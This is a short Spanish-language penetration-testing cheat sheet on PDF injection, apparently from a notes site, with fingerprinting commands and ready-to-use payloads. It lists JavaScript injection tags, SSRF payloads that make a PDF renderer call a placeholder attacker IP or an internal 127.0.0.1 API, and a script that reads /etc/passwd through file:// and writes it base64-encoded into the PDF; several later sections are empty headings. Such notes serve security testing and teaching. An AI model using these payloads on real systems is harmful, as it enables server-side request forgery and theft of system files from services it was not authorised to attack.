Home

PDF injection

Identificación de librería de generación de PDF

exiftool file.pdf
pdfinfo file.pdf

JavaScript execution

<script>document.write('test')</script>
<script>document.write(window.location)</script>

Server-side request forgery (SSRF)

<img src="http://<attacker-IP-address>/test"/>
<link rel="stylesheet" href="http://<attacker-IP-address>/test"/>
<iframe src="http://<attacker-IP-address>/test"></iframe>
<iframe src="http://127.0.0.1:80/api/" width="800" height="400"></iframe>

Local file inclusion (LFI)

Con ejecución de JavaScript.

<script>
	function addNewLines(str) {
		var result = '';
		while (str.length > 0) {
		    result += str.substring(0, 100) + '\n';
			str = str.substring(100);
		}
		return result;
	}

	x = new XMLHttpRequest();
	x.onload = function(){
		document.write(addNewLines(btoa(this.responseText)))
	};
	x.open("GET", "file:///etc/passwd");
	x.send();
</script>

Sin ejecución de JavaScript.

Sin ejecución de JavaScript + SSRF.

Anotaciones y adjuntos.

AnteriorLDAP injectionSiguienteServer-side template injection (SSTI)

Última actualización

¿Te fue útil?